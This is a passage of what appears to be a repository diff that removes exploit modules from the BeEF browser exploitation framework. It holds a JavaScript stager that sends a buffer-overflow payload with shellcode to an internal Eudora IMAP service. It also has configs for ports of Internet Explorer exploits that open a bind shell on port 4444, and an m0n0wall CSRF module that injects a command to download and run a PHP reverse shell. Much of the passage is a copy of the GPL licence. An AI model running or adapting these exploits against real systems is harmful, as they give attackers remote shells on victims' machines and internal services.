* In order to properly calculate the exact size of the cross-domain request headers,
* we send a bogus request back to BeEF (different port, so still cross-domain).
*
* get_junk_size():
* Then we retrieve the total size of the HTTP headers, as well as other specific headers like 'Host'
*
* calc_junk_size():
* Calculate the differences with the request that will be sent to the target, for example:
* "Host: 172.16.67.1:2000\r\n" //24 bytes
* "Host: 172.16.67.135:143\r\n" //25 bytes
*/
send_stager_back = function(){
var uri = "http://" + beef_host + ":" + beef_junk_port + "/";
var xhr = new XMLHttpRequest();
xhr.open("POST", uri, true);
xhr.setRequestHeader("Content-Type", "text/plain");
xhr.setRequestHeader('Accept','*/*');
xhr.setRequestHeader("Accept-Language", "en");
xhr.send("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
log("send_stager_back: sending back the stager to calculate headers size");
};
var timeout_counter = 0;
var timeout = 10;
var size,host,contenttype,referer,nops = null;
get_junk_size = function(){
var junk_name = "";
var uri = beef_proto + "://" + beef_host + ":" + beef_port + "/api/ipec/junk/" + sock_name;
$j.ajax({
type: "GET",
url: uri,
dataType: "json",
success: function(data, textStatus, xhr){
size = data.size;
host = data.host;
contenttype = data.contenttype;
referer = data.referer;
//todo to it better
nops = data.nops;
log("get_junk_size: OK - size [" + size + "] - host [" +
host + "] - contenttype [" + contenttype + "] - referer [" + referer + "]");
},
error: function(jqXHR, textStatus, errorThrown){
timeout_counter++;
// re-tries for 10 times (10 seconds)
if (timeout_counter < timeout) {
log("get_junk_size: ERROR - no data yet. re-trying.");
setTimeout(function() {get_junk_size()},1000);
}else{
log("get_junk_size: ERROR - timeout reached. giving up.");
}
}
});
};
var final_junk_size = null;
calc_junk_size = function(){
final_junk_size = size;
// 8 -> Host: \r\n
var new_host = (rhost+":"+service_port).length + 8;
if(new_host != host){
if(new_host > host){
var diff = new_host - host;
final_junk_size += diff;
}else{
var diff = host - new_host;
final_junk_size -= diff;
}
}
log("get_junk_size: final_junk_size -> [" + final_junk_size + "]");
//content-type "; charset=UTF-8" will not be present at the end, in the new request - we save 15 bytes
if(contenttype > 26)
final_junk_size -= 15;
// referrer should be the same
// we can also override the UserAgent (deliovering the Firefox Extension). We can then save 90 bytes or more.
log("get_junk_size: final_junk_size -> [" + final_junk_size + "]");
};
var stager_successfull = false;
send_stager = function(){
try{
xhr = new XMLHttpRequest();
var uri = "http://" + rhost + ":" + service_port + path;
log("send_stager: URI " + uri);
xhr.open("POST", uri, true);
xhr.setRequestHeader("Content-Type", "text/plain");
//todo: if for some reasons the headers are too big (bigger than 425 bytes),
// a warning should be displayed, because the exploit will not work, given the
// space for the shellcode that we have.
// The likelihood of this can be minimized thanks to the Firefox Extension we deliver
// to disable PortBanning. We are also overriding the UserAgent, so we save up to 100 bytes of space.
var junk = available_space - stager.length - final_junk_size; // 22 bytes
var junk_data = gen_nops(junk);
var payload = junk_data + stager + next_seh + seh + egg_hunter;
var decoded_payload = Base64Binary.decode(btoa(payload));
var c = "";
for (var i = 0; i < decoded_payload.length; i++) {
c += String.fromCharCode(decoded_payload[i] & 0xff);
}
//needed to have the service replying before sending the actual exploit
xhr.open("POST", uri, true);
xhr.setRequestHeader("Content-Type", "text/plain");
xhr.setRequestHeader('Accept','*/*');
xhr.setRequestHeader("Accept-Language", "en");
xhr.send("a001 LIST \r\n");
// / needed to have the service replying before sending the actual exploit
xhr.open("POST", uri, true);
xhr.setRequestHeader("Content-Type", "text/plain");
xhr.setRequestHeader('Accept','*/*');
xhr.setRequestHeader("Accept-Language", "en");
var post_body = "a001 LIST " + "}" + c + "}" + "\r\n";
log("send_stager: Final body length [" + post_body.length + "]");
// this is required only with WebKit browsers.
if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
beef.debug("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
function byteValue(x) {
return x.charCodeAt(0) & 0xff;
}
var ords = Array.prototype.map.call(datastr, byteValue);
var ui8a = new Uint8Array(ords);
this.send(ui8a.buffer);
}
}
xhr.sendAsBinary(post_body);
log("send_stager: stager sent.");
stager_successfull = true;
}catch(exception){
beef.debug("!!! Exception: " + exception);
// Check for PortBanning exceptions:
//NS_ERROR_PORT_ACCESS_NOT_ALLOWED: Establishing a connection to an unsafe or otherwise banned port was prohibited
if(exception.toString().indexOf('NS_ERROR_PORT_ACCESS_NOT_ALLOWED') != -1){
// not exactly needed but just in case
stager_successfull = false;
log("Error: NS_ERROR_PORT_ACCESS_NOT_ALLOWED. Looks like PortBanning for port [" + service_port + "] is still enabled!");
}
}
};
deploy_stage = function () {
if(stager_successfull){
// As soon as the stage is running, the HTTP responses will contain Access-Control-Allow-Origin: *
// so we can communicate with CORS normally.
var decoded_shellcode = Base64Binary.decode(btoa(stage_allow_origin));
var c = "";
for (var i = 0; i < decoded_shellcode.length; i++) {
c += String.fromCharCode(decoded_shellcode[i] & 0xff);
}
var post_body = "cmd=" + c;
var uri = "http://" + rhost + ":" + rport + path;
xhr = new XMLHttpRequest();
beef.debug("uri: " + uri);
xhr.open("POST", uri, true);
xhr.setRequestHeader("Content-Type", "text/plain");
// this is required only with WebKit browsers.
if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
beef.debug("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
function byteValue(x) {
return x.charCodeAt(0) & 0xff;
}
var ords = Array.prototype.map.call(datastr, byteValue);
var ui8a = new Uint8Array(ords);
this.send(ui8a.buffer);
}
}
xhr.sendAsBinary(post_body);
log("deploy_stage: stage sent.\r\n You should be now able to use beef_bind_shell module to send commands.");
}else{
log("Skipping Stage delivery because Stager failed.");
}
};
log = function(data){
beef.net.send("<%= @command_url %>", <%= @command_id %>, data);
beef.debug(data);
};
/*
* To calculate exact HTTP header size we send a request back to BeEF, on a different socket, to maintain
* the cross-domain behavior.
*/
send_stager_back();
/*
* Deliver Stager and Stage.
*
* The following timeouts should be enough with normal DSL lines.
* Increase delay value for slower clients.
*/
setTimeout("get_junk_size()", delay/2);
setTimeout("calc_junk_size()", delay);
setTimeout("send_stager()", 2000 + delay);
setTimeout("deploy_stage()", 6000 + delay);
});

15
modules/exploits/beefbind/beef_bind_exploits/eudora_mail_beef_bind/config.yaml
View File

@@ -1,15 +0,0 @@
#
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
Eudora_mail_beef_bind:
enable: true
category: ["Exploits", "BeEF_bind"]
name: "Eudora Mail 3"
description: "Pwn internal services with a custom staging shellcode. Both the stager and the stage are delivered.<br />Exploit Eudora Mail 3 (v. v6.1.19.0) on Windows (POP ECX mailcmn.dll): SEH exploit with EggHunter."
authors: ["antisnatchor", "tymiller"] # shellcode awesomeness -> Ty Miller
target:
working: ["FF"]

28
modules/exploits/beefbind/beef_bind_exploits/eudora_mail_beef_bind/module.rb
View File

@@ -1,28 +0,0 @@
#
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Eudora_mail_beef_bind < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
beef_host = configuration.get('beef.http.host').to_s
beef_port = configuration.get('beef.http.port').to_s
[
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' },
{ 'name' => 'service_port', 'ui_label' => 'Target Port', 'value' => '143' },
{ 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444' },
{ 'name' => 'path', 'ui_label' => 'Path', 'value' => '/' },
{ 'name' => 'delay', 'ui_label' => 'Add delay (ms)', 'value' => '4000' },
{ 'name' => 'beef_host', 'ui_label' => 'BeEF Host', 'value' => beef_host },
{ 'name' => 'beef_port', 'ui_label' => 'BeEF Port', 'value' => beef_port },
{ 'name' => 'beef_junk_port', 'ui_label' => 'BeEF Junk Port', 'value' => '2000' },
{ 'name' => 'beef_junk_socket', 'ui_label' => 'BeEF Junk Socket Name', 'value' => 'imapeudora1' }
]
end
def post_execute
save({ 'result' => @datastore['result'] })
end
end

34
modules/exploits/local_host/ie_ms12_004_midi/command.js
View File

@@ -1,34 +0,0 @@
//
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// check browser
if (beef.browser.isIE() != 1) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "error=Target browser is not Internet Explorer");
return
}
// check OS
if (beef.os.isWindows() != 1) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "error=Target OS is not Windows");
return
}
// exploit
var url = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/ie_ms12_004_midi.html';
var timeout = 15;
var ie_ms12_004_midi_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
ie_ms12_004_midi_iframe_<%= @command_id %>.setAttribute('src', url)
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit attempted. Check for your shell on port 4444");
// cleanup
cleanup = function() {
document.body.removeChild(ie_ms12_004_midi_iframe_<%= @command_id %>);
}
setTimeout("cleanup()", timeout*1000);
});

26
modules/exploits/local_host/ie_ms12_004_midi/config.yaml
View File

@@ -1,26 +0,0 @@
#
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
###
# This module is a quick, dirty and butchered port of 'modules/exploits/windows/browser/ms12_004_midi.rb'
# from the Metasploit Framework project. Written originally by Shane Garrett, juan vazquez, and sinn3r
# See: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_004_midi.rb
###
beef:
module:
ie_ms12_004_midi:
enable: true
category: ["Exploits", "Local Host"]
name: "IE MS12-004 midiOutPlayNextPolyEvent Heap Overflow"
description: "This module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using the Windows Media Player ActiveX control.<br/><br/>This exploit has been ported from <a href='http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_004_midi.rb'>ms12_004_midi.rb</a> from Metasploit, however it has limited target support and limited payloads<br/><br/><b>Targets:</b> IE6-IE7 on WinXP SP2-SP3<br/><b>Payloads:</b> bind shell on port 4444<br/><br/>For more browser based Metasploit exploits and payloads refer to the <a href='https://github.com/beefproject/beef/wiki/Metasploit' target='_blank'>Metasploit Integration for BeEF</a> page on the wiki."
authors: ['Shane Garrett', 'juan vazquez', 'sinn3r']
target:
user_notify:
IE:
min_ver: 6
max_ver: 7
not_working:
ALL:
os: ["ALL"]

BIN
modules/exploits/local_host/ie_ms12_004_midi/ie_ms12_004_midi.mid
View File

Binary file not shown.

22
modules/exploits/local_host/ie_ms12_004_midi/module.rb
View File

@@ -1,22 +0,0 @@
#
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
###
# This module is a quick, dirty and butchered port of 'modules/exploits/windows/browser/ms12_004_midi.rb'
# from the Metasploit Framework project. Written originally by Shane Garrett, juan vazquez, and sinn3r
# See: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_004_midi.rb
###
class Ie_ms12_004_midi < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/ie_ms12_004_midi/ie_ms12_004_midi.html', '/ie_ms12_004_midi', 'html')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/ie_ms12_004_midi/ie_ms12_004_midi.mid', '/ie_ms12_004_midi', 'mid')
end
def post_execute
save({ 'result' => @datastore['result'] })
# BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/ie_ms12_004_midi.html')
# BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/ie_ms12_004_midi.mid')
end
end

25
modules/exploits/local_host/ie_ms13_069_caret/command.js
View File

@@ -1,25 +0,0 @@
//
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// check browser
if (beef.browser.isIE8() != 1) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "error=Target browser is not Internet Explorer 8");
return
}
// check OS
if (beef.os.isWindows() != 1) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "error=Target OS is not Windows");
return
}
// exploit
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit attempted. Check for your shell on port 4444");
window.location = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/ie_ms13_069_caret.html';
});

26
modules/exploits/local_host/ie_ms13_069_caret/config.yaml
View File

@@ -1,26 +0,0 @@
#
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
###
# This module is a quick, dirty and butchered port of 'modules/exploits/windows/browser/ms13_069_caret.rb'
# from the Metasploit Framework project. Written originally by corelanc0d3r (@corelanc0d3r) and sinn3r (@_sinn3r)
# See: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms13_069_caret.rb
###
beef:
module:
ie_ms13_069_caret:
enable: true
category: ["Exploits", "Local Host"]
name: "IE MS13-069 CCaret Use-After-Free"
description: "This module exploits a use-after-free vulnerability in Internet Explorer. The vulnerability occurs in how the browser handles the caret (text cursor) object.<br/><br/>This exploit has been ported from <a href='http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms13_069_caret.rb'>ms13_069_caret.rb</a> from Metasploit, however it has limited target support and payloads.<br/><br/><b>Targets:</b> IE 8 on WinXP SP3<br/><b>Payloads:</b> bind shell on port 4444<br/><br/>For more browser based Metasploit exploits and payloads refer to the <a href='https://github.com/beefproject/beef/wiki/Metasploit' target='_blank'>Metasploit Integration for BeEF</a> page on the wiki."
authors: ['corelanc0d3r (@corelanc0d3r)', 'sinn3r (@_sinn3r)']
target:
user_notify:
IE:
min_ver: 8
max_ver: 8
not_working:
ALL:
os: ["ALL"]

10
modules/exploits/local_host/ie_ms13_069_caret/ie_ms13_069_caret.html
View File

@@ -1,10 +0,0 @@
<!DOCTYPE html>
<html>
<head>
<script>
</script>
</head>
<body onbeforeeditfocus="trigger()">
</body>
</html>

20
modules/exploits/local_host/ie_ms13_069_caret/module.rb
View File

@@ -1,20 +0,0 @@
#
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
###
# This module is a quick, dirty and butchered port of 'modules/exploits/windows/browser/ms13_069_caret.rb'
# from the Metasploit Framework project. Written originally by corelanc0d3r (@corelanc0d3r) and sinn3r (@_sinn3r)
# See: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms13_069_caret.rb
###
class Ie_ms13_069_caret < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/ie_ms13_069_caret/ie_ms13_069_caret.html', '/ie_ms13_069_caret', 'html')
end
def post_execute
save({ 'result' => @datastore['result'] })
# BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/ie_ms13_069_caret.html')
end
end

339
modules/exploits/m0n0wall/COPYING.GPL
View File

@@ -1,339 +0,0 @@
GNU GENERAL PUBLIC LICENSE
Version 2, June 1991
Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The licenses for most software are designed to take away your
freedom to share and change it. By contrast, the GNU General Public
License is intended to guarantee your freedom to share and change free
software--to make sure the software is free for all its users. This
General Public License applies to most of the Free Software
Foundation's software and to any other program whose authors commit to
using it. (Some other Free Software Foundation software is covered by
the GNU Lesser General Public License instead.) You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
this service if you wish), that you receive source code or can get it
if you want it, that you can change the software or use pieces of it
in new free programs; and that you know you can do these things.
To protect your rights, we need to make restrictions that forbid
anyone to deny you these rights or to ask you to surrender the rights.
These restrictions translate to certain responsibilities for you if you
distribute copies of the software, or if you modify it.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must give the recipients all the rights that
you have. You must make sure that they, too, receive or can get the
source code. And you must show them these terms so they know their
rights.
We protect your rights with two steps: (1) copyright the software, and
(2) offer you this license which gives you legal permission to copy,
distribute and/or modify the software.
Also, for each author's protection and ours, we want to make certain
that everyone understands that there is no warranty for this free
software. If the software is modified by someone else and passed on, we
want its recipients to know that what they have is not the original, so
that any problems introduced by others will not reflect on the original
authors' reputations.
Finally, any free program is threatened constantly by software
patents. We wish to avoid the danger that redistributors of a free
program will individually obtain patent licenses, in effect making the
program proprietary. To prevent this, we have made it clear that any
patent must be licensed for everyone's free use or not licensed at all.
The precise terms and conditions for copying, distribution and
modification follow.
GNU GENERAL PUBLIC LICENSE
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
0. This License applies to any program or other work which contains
a notice placed by the copyright holder saying it may be distributed
under the terms of this General Public License. The "Program", below,
refers to any such program or work, and a "work based on the Program"
means either the Program or any derivative work under copyright law:
that is to say, a work containing the Program or a portion of it,
either verbatim or with modifications and/or translated into another
language. (Hereinafter, translation is included without limitation in
the term "modification".) Each licensee is addressed as "you".
Activities other than copying, distribution and modification are not
covered by this License; they are outside its scope. The act of
running the Program is not restricted, and the output from the Program
is covered only if its contents constitute a work based on the
Program (independent of having been made by running the Program).
Whether that is true depends on what the Program does.
1. You may copy and distribute verbatim copies of the Program's
source code as you receive it, in any medium, provided that you
conspicuously and appropriately publish on each copy an appropriate
copyright notice and disclaimer of warranty; keep intact all the
notices that refer to this License and to the absence of any warranty;
and give any other recipients of the Program a copy of this License
along with the Program.
You may charge a fee for the physical act of transferring a copy, and
you may at your option offer warranty protection in exchange for a fee.
2. You may modify your copy or copies of the Program or any portion
of it, thus forming a work based on the Program, and copy and
distribute such modifications or work under the terms of Section 1
above, provided that you also meet all of these conditions:
a) You must cause the modified files to carry prominent notices
stating that you changed the files and the date of any change.
b) You must cause any work that you distribute or publish, that in
whole or in part contains or is derived from the Program or any
part thereof, to be licensed as a whole at no charge to all third
parties under the terms of this License.
c) If the modified program normally reads commands interactively
when run, you must cause it, when started running for such
interactive use in the most ordinary way, to print or display an
announcement including an appropriate copyright notice and a
notice that there is no warranty (or else, saying that you provide
a warranty) and that users may redistribute the program under
these conditions, and telling the user how to view a copy of this
License. (Exception: if the Program itself is interactive but
does not normally print such an announcement, your work based on
the Program is not required to print an announcement.)
These requirements apply to the modified work as a whole. If
identifiable sections of that work are not derived from the Program,
and can be reasonably considered independent and separate works in
themselves, then this License, and its terms, do not apply to those
sections when you distribute them as separate works. But when you
distribute the same sections as part of a whole which is a work based
on the Program, the distribution of the whole must be on the terms of
this License, whose permissions for other licensees extend to the
entire whole, and thus to each and every part regardless of who wrote it.
Thus, it is not the intent of this section to claim rights or contest
your rights to work written entirely by you; rather, the intent is to
exercise the right to control the distribution of derivative or
collective works based on the Program.
In addition, mere aggregation of another work not based on the Program
with the Program (or with a work based on the Program) on a volume of
a storage or distribution medium does not bring the other work under
the scope of this License.
3. You may copy and distribute the Program (or a work based on it,
under Section 2) in object code or executable form under the terms of
Sections 1 and 2 above provided that you also do one of the following:
a) Accompany it with the complete corresponding machine-readable
source code, which must be distributed under the terms of Sections
1 and 2 above on a medium customarily used for software interchange; or,
b) Accompany it with a written offer, valid for at least three
years, to give any third party, for a charge no more than your
cost of physically performing source distribution, a complete
machine-readable copy of the corresponding source code, to be
distributed under the terms of Sections 1 and 2 above on a medium
customarily used for software interchange; or,
c) Accompany it with the information you received as to the offer
to distribute corresponding source code. (This alternative is
allowed only for noncommercial distribution and only if you
received the program in object code or executable form with such
an offer, in accord with Subsection b above.)
The source code for a work means the preferred form of the work for
making modifications to it. For an executable work, complete source
code means all the source code for all modules it contains, plus any
associated interface definition files, plus the scripts used to
control compilation and installation of the executable. However, as a
special exception, the source code distributed need not include
anything that is normally distributed (in either source or binary
form) with the major components (compiler, kernel, and so on) of the
operating system on which the executable runs, unless that component
itself accompanies the executable.
If distribution of executable or object code is made by offering
access to copy from a designated place, then offering equivalent
access to copy the source code from the same place counts as
distribution of the source code, even though third parties are not
compelled to copy the source along with the object code.
4. You may not copy, modify, sublicense, or distribute the Program
except as expressly provided under this License. Any attempt
otherwise to copy, modify, sublicense or distribute the Program is
void, and will automatically terminate your rights under this License.
However, parties who have received copies, or rights, from you under
this License will not have their licenses terminated so long as such
parties remain in full compliance.
5. You are not required to accept this License, since you have not
signed it. However, nothing else grants you permission to modify or
distribute the Program or its derivative works. These actions are
prohibited by law if you do not accept this License. Therefore, by
modifying or distributing the Program (or any work based on the
Program), you indicate your acceptance of this License to do so, and
all its terms and conditions for copying, distributing or modifying
the Program or works based on it.
6. Each time you redistribute the Program (or any work based on the
Program), the recipient automatically receives a license from the
original licensor to copy, distribute or modify the Program subject to
these terms and conditions. You may not impose any further
restrictions on the recipients' exercise of the rights granted herein.
You are not responsible for enforcing compliance by third parties to
this License.
7. If, as a consequence of a court judgment or allegation of patent
infringement or for any other reason (not limited to patent issues),
conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot
distribute so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you
may not distribute the Program at all. For example, if a patent
license would not permit royalty-free redistribution of the Program by
all those who receive copies directly or indirectly through you, then
the only way you could satisfy both it and this License would be to
refrain entirely from distribution of the Program.
If any portion of this section is held invalid or unenforceable under
any particular circumstance, the balance of the section is intended to
apply and the section as a whole is intended to apply in other
circumstances.
It is not the purpose of this section to induce you to infringe any
patents or other property right claims or to contest validity of any
such claims; this section has the sole purpose of protecting the
integrity of the free software distribution system, which is
implemented by public license practices. Many people have made
generous contributions to the wide range of software distributed
through that system in reliance on consistent application of that
system; it is up to the author/donor to decide if he or she is willing
to distribute software through any other system and a licensee cannot
impose that choice.
This section is intended to make thoroughly clear what is believed to
be a consequence of the rest of this License.
8. If the distribution and/or use of the Program is restricted in
certain countries either by patents or by copyrighted interfaces, the
original copyright holder who places the Program under this License
may add an explicit geographical distribution limitation excluding
those countries, so that distribution is permitted only in or among
countries not thus excluded. In such case, this License incorporates
the limitation as if written in the body of this License.
9. The Free Software Foundation may publish revised and/or new versions
of the General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the Program
specifies a version number of this License which applies to it and "any
later version", you have the option of following the terms and conditions
either of that version or of any later version published by the Free
Software Foundation. If the Program does not specify a version number of
this License, you may choose any version ever published by the Free Software
Foundation.
10. If you wish to incorporate parts of the Program into other free
programs whose distribution conditions are different, write to the author
to ask for permission. For software which is copyrighted by the Free
Software Foundation, write to the Free Software Foundation; we sometimes
make exceptions for this. Our decision will be guided by the two goals
of preserving the free status of all derivatives of our free software and
of promoting the sharing and reuse of software generally.
NO WARRANTY
11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN
OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE
PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
REPAIR OR CORRECTION.
12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.
END OF TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
convey the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) <year> <name of author>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
Also add information on how to contact you by electronic and paper mail.
If the program is interactive, make it output a short notice like this
when it starts in an interactive mode:
Gnomovision version 69, Copyright (C) year name of author
Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show c' for details.
The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License. Of course, the commands you use may
be called something other than `show w' and `show c'; they could even be
mouse-clicks or menu items--whatever suits your program.
You should also get your employer (if you work as a programmer) or your
school, if any, to sign a "copyright disclaimer" for the program, if
necessary. Here is a sample; alter the names:
Yoyodyne, Inc., hereby disclaims all copyright interest in the program
`Gnomovision' (which makes passes at compilers) written by James Hacker.
<signature of Ty Coon>, 1 April 1989
Ty Coon, President of Vice
This General Public License does not permit incorporating your program into
proprietary programs. If your program is a subroutine library, you may
consider it more useful to permit linking proprietary applications with the
library. If this is what you want to do, use the GNU Lesser General
Public License instead of this License.

6
modules/exploits/m0n0wall/COPYING.PHP-REVERSE-SHELL
View File

@@ -1,6 +0,0 @@
This tool may be used for legal purposes only. Users take full responsibility
for any actions performed using this tool. The author accepts no liability for
damage caused by this tool. If these terms are not acceptable to you, then do
not use this tool.
In all other respects the GPL version 2 applies.

34
modules/exploits/m0n0wall/command.js
View File

@@ -1,34 +0,0 @@
//
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var lhost = '<%= @lhost %>';
var lport = '<%= @lport %>';
var uri = "http://" + rhost + ":" + rport + "/exec_raw.php?cmd=echo%20-e%20%22%23%21%2Fusr%2Flocal%2Fbin%2Fphp%5Cn%3C%3Fphp%20eval%28%27%3F%3E%20%27.file_get_contents%28%27" + beef.net.httpproto + "%3A%2F%2F" + beef.net.host + ":" + beef.net.port + "%2Fphp-reverse-shell.php%27%29.%27%3C%3Fphp%20%27%29%3B%20%3F%3E%22%20%3E%20x.php%3Bcat%20x.php%3Bchmod%20755%20x.php%3B";
beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){
if(response.status_code == 200){
function triggerReverseConn(){
beef.net.forge_request("http", "GET", rhost, rport, "/x.php?ip=" + lhost + "&port=" + lport, null, null, null, 10, 'script', true, null,function(response){
if(response.status_code == 200){
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse shell should have been triggered.");
}else{
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: second GET request failed.");
}
});
}
setTimeout(triggerReverseConn,5000);
}else{
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: first GET request failed.");
}
});
});

15
modules/exploits/m0n0wall/config.yaml
View File

@@ -1,15 +0,0 @@
#
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
monowall_reverse_root_shell_csrf:
enable: true
category: "Exploits"
name: "m0n0wall Reverse Root Shell CSRF"
